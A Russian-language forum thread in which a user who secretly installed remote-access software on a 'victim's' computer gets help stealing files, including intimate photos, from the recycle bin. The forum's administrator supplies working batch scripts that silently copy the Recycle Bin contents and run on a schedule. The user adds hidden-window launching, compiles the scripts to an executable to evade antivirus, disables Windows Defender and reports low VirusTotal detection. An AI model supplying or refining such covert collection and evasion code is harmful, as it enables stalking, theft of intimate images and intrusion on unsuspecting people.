• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Подмена корзины на рабочем столе ПК

  • Автор темы Принц Птица
  • Дата начала

П

Принц Птица

Гость
Не знаю, в правильном ли месте я создал тему для вопроса, заранее извиняюсь.

Помогите мне решить проблему, если это возможно. Я установил RMS скрытно, но я не успеваю воровать данные, т.к. пользователь почти сразу очищает корзину с данными. Есть ли такая возможность, чтобы подменить жертве корзину на другую корзину, идентичную по внешности функционалу, но чтобы эта подменная корзина не удаляла ничего, а лишь делала вид что очищает её? Если есть такая возможность, то подскажите как это сделать или дайте ссылку, буду очень благодарен.

И, еще один вопрос, касающейся этой же корзины. Чтобы удалённые файлы не переполнялись в скрытой системной папке, было бы не плохо если была бы такая задача, чтобы она могла самостоятельно очищаться через промежуток времени, например через одну неделю, для того, чтобы жертва не смогла заподозрить, что в локальном диске осталось меньше свободного места. Может быть как то можно это всё сделать через батник? Или подскажите возможный альтернативный вариант, если это также возможно. Спасибо!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
но чтобы эта подменная корзина не удаляла ничего, а лишь делала вид что очищает её? Если есть такая возможность, то подскажите как это сделать или дайте ссылку, буду очень благодарен.
Не лучше-ли копировать из корзины в какую-то другую папку временно ?Не въехал!!!

Например через какой-то промежуток времени проверять есть-ли какие-то файлы в корзине а потом копировать их во временную папку...

Делать это можно и батником, потом добавить задание в планировщик + и удалять файлы тоже через какое-то время в планировщике...Не въехал!!!
 
П

Принц Птица

Гость
X-Shar,
X-Shar,
В том то и проблема что не могу копировать из корзины в другую папку, т.к. в RMS он может переименовывать, скачиваться, запускать, а удаленно чтобы скопировать в другую папку - не получается через менеджер файлов, почему-то этой функции нету там.

А какой код в батнике должен быть, чтобы он мог это сделать автоматически? У меня есть возможность запускать батник на компьютере жертвы, но основы знания написания батника - у меня нет, к сожалению.

И у меня не всегда есть доступ к компьютеру по разным причинам, поэтому даже если бы я мог переносить временно из корзины файлы в другую папку, я бы просто напросто не успел бы это сделать, жертва очищает корзину почти сразу, редко когда забывает это сделать, поэтому автономный вариант копирования без моего участия единственный выход спасти данные.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
А какой код в батнике должен быть, чтобы он мог это сделать автоматически?
Есть несколько вариантов:

1)Просто копировать файлы во временную папку, а потом удалять, единственное я не помню в какой папке располагается корзина, приведу пример с произвольной папкой:
Код:
del “f:\backup\old” /s /q
rmdir “f:\backup\old” /s /q
rename “f:\backup\new” “old”
xcopy "C:\docent" "f:\backup\new" /s/c/h/n/y/
По мойму так, при втором запуске переименовывает каталог new в old, создает заново каталог new и копирует файлы. Т.е. батник дает возможность хранить “двухдневные” бэкапы...

2)Использовать винрар, если установлен, тоже самое:
Код:
del “f:\backup\old” /s /q
rmdir “f:\backup\old” /s /q
rename “f:\backup\new” “old”
mkdir “f:\backup\new”
“C:\Program FilesWinRAR\Rar.exe” a -m5 -ep -dh -inul p123 ARHIV_DOCENTA C:\docen\*.*
Данный код сделает запароленный архив...

C:\docent нужно поменять на путь до корзины...

Путь до корзины в зависимости от системы, на хрюше это Recicled по мойму, на остальных не знаю, поиск гугл...Отдыхай!!!
 
П

Принц Птица

Гость
Я попробовал у себя на компьютере по первому варианту, батник срабатывает, но ничего не происходит, или может я не туда гляжу. В общем вот какой код:
Код:
1. del “D:\backup\old” /s /q
2. rmdir “D:\backup\old” /s /q
3. rename “D:\backup\new” “old”
4. xcopy "c:\$Recycle.Bin\S-1-5-21-3477554348-3782734642-2060518751-1001\" "D:\backup\new" /s/c/h/n/y/
Где я допустил ошибку?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Где я допустил ошибку?
Кавычки не нужны, вот 100% будет работать:
Код:
del D:\backup\old /s /q
rmdir D:\backup\old /s /q
rename D:\backup\new old
xcopy c:\$Recycle.Bin\S-1-5-21-3477554348-3782734642-2060518751-1001 D:\backup\new\ /s/c/h/n/y/
pause
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
А я вот что-то не пойму, зачем отслеживать корзину, или специфика какая-то, первый раз такое слышу что-бы кто-то корзину именно мониторил, что это если не секрет ?Не въехал!!!

А так рекомендую сделать два батника:

1)Будет копировать

2)Удалять старые папки, его лучше вообще вручную запускать...

А первый батник нужно как-то добавить в планировщик задач, чтобы он постоянно копировал файлы из корзины, раз в минуту к примеру делать запуск !
 
П

Принц Птица

Гость
Спасибо, всё работает замечательно. Но возникла следующая проблема, запуск .cmd палит своё присутствие. А в корзине могут быть огромных объёмов файлы, поэтому копирование будет происходить не слишком быстро, окно батника всё же сильно палит. Я попытался в гугле поискать код фонового режима, сколько не пытался сделать, у меня не получается. Вот код:
Код:
01	rem Запуск батника в скрытом режиме
	@echo off
	
	rem Готовим рабочий бат-файл
	echo dir /s c:\^>log.txt>wait.cmd
	
	rem Готовим файл запуска в скрытом режиме
	echo Set WshShell = CreateObject("WScript.Shell") >start.vbs
   echo WshShell.Run "cmd.exe /c wait.cmd", 0, false>>start.vbs
	
   rem Запускает на выполнение в скрытом режиме, конца выполнения не ждём.
   cscript.exe //b //nologo start.vbs
   
	rem Стираем временные файлы
	del /f /q start.vbs
   del /f /q wait.cmd
Вопрос у меня в следующем, можно конечно и двумя батниками, однако у меня есть другая находка идеи:
Убрать корзину с рабочего стола и заменить её екзешником, однако не знаю как сделать, чтобы он менял вид как папка, корзина пустая, а когда корзина полная. Можно было бы собрать такой экзешник, который бы пользователь когда решит очистить корзину, нажмёт на подменную корзину и сработает батник копирования и одновременно с этим запустит ярлык настоящей корзины. Но, опять есть сложность, что не исключено что пользователь вместо того, чтобы открыть корзину, просто нажимает на правую кнопки мыши и прямо из ветки меню очищает корзину. Было бы не плохо если можно было на экзешник настраивать ещё и меню ветки, где очистка корзины также бы выполняло команду копирования.

Хотя, конечно, пока буду пользоваться этими двумя рекомендованными батниками. До тех пор пока не смогу добраться до способа заменить этот вариант на подмену корзины. Хоть что-то уже имею и это для меня положительно идёт в мою пользу.

А я вот что-то не пойму, зачем отслеживать корзину, или специфика какая-то, первый раз такое слышу что-бы кто-то корзину именно мониторил, что это если не секрет ?Не въехал!!!
У жертвы есть соседка, которая приходит в гости и с телефона копирует интимные фотографии и видео в компьютер, и загружает своему любовнику в личку. Потом она просто удаляет эти файлы и чистит корзину. Для доступ к данным не имеет никакой ценности, но как ранее я говорил в ответе на тему скрытой веб камеры, что это мой огромный интерес без вреда и корысти незаметно следить и наблюдать. Это моя ранняя детская мечта, которую пытаюсь осуществитьMy mind смех-смех!!!
 
П

Принц Птица

Гость
Проблему скрытного запуска батника решил программой Quick Batch File CompilerОтдыхай!!!
И, почти, не обнаруживается антивирусами в VirusTotal обнаружено только 10 из 54, что в общем то очень хороший результат для меня. Однако во время создания батника в екзешник, защитник виндус ликвидировал его, пришлось отключать его. А после созданного екзешника больше не обнаруживается защитником, или реакция у него очень медленная, мой добрый антивирус антимальваре тоже не обнаружил егоbig010101
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
И, почти, не обнаруживается антивирусами в VirusTotal обнаружено только 10 из 54
А мне больше нравится Exe Script Converter.Можешь скачать на официальном (или ) и зарегать этим ключиком.
 
Верх Низ